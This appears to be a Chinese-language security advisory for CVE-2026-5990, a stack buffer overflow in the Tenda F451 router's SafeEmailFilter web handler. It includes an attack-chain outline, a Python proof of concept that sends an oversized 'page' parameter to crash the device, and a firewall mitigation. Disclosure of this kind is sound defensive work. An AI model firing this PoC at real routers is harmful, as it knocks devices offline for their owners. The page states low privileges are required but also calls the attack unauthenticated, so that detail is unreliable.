CVE-2026-5990 CVSS 8.8 高危

CVE-2026-5990: Tenda F451栈缓冲区溢出漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5990

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda F451

漏洞概述

Tenda F451路由器V1.0.0.7版本存在严重的栈缓冲区溢出安全漏洞。该漏洞源于/goform/SafeEmailFilter接口的fromSafeEmailFilter函数在处理page参数时未进行有效边界检查。未经身份验证的攻击者可远程发送特制数据包触发该漏洞，可能导致设备拒绝服务或执行任意代码。

技术细节

该漏洞的根源在于Tenda F451路由器固件Web服务组件中的不安全编码实践。具体而言，在处理/goform/SafeEmailFilter HTTP请求时，后端调用了fromSafeEmailFilter函数。该函数直接使用不安全的内存操作函数（如strcpy）处理用户提交的page参数，而未预先验证数据长度。当传入的page参数长度超过栈缓冲区预留空间时，将发生栈缓冲区溢出。攻击者可精心构造恶意Payload覆盖返回地址，劫持程序执行流。鉴于CVSS评分8.8，该漏洞利用难度低且影响严重，攻击者无需用户交互即可远程利用，完全攻陷设备机密性、完整性和可用性。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别Tenda F451路由器设备及其Web管理接口。

STEP 2

漏洞利用

攻击者向/goform/SafeEmailFilter接口发送POST请求，并在page参数中注入超长恶意数据。

STEP 3

溢出触发

由于未进行边界检查，超长数据覆盖栈内存，导致缓冲区溢出，覆盖返回地址。

STEP 4

执行代码

程序流程被劫持，攻击者获得设备控制权，导致敏感信息泄露或设备瘫痪。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_tenda_f451(target_ip):
    """
    PoC for CVE-2026-5990 Stack-based Buffer Overflow in Tenda F451.
    This script sends a malicious payload to the 'page' parameter.
    """
    url = f"http://{target_ip}/goform/SafeEmailFilter"
    
    # Construct a large payload to trigger the buffer overflow
    # Adjust the length based on specific buffer size (e.g., 1000 bytes)
    payload = "A" * 1000
    
    data = {
        "page": payload
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        print(f"[+] Response status code: {response.status_code}")
        print("[+] Exploit sent. Check the target device for crash.")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_tenda_f451(target)

影响范围

Tenda F451 1.0.0.7

防御指南

临时缓解措施

如果无法立即升级固件，建议在网络边界防火墙处限制对设备管理端口（通常为TCP 80/443）的访问来源，仅允许受信任的内网管理主机进行连接，从而防止外部攻击者利用此漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5990
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5990
3 Details https://www.cvedetails.com/cve/CVE-2026-5990/
4 VulDB https://vuldb.com/cve/CVE-2026-5990
5 Link https://github.com/Jimi-Lab/cve/issues/8
6 Link https://vuldb.com/submit/792861
7 Link https://vuldb.com/vuln/356544
8 Link https://vuldb.com/vuln/356544/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表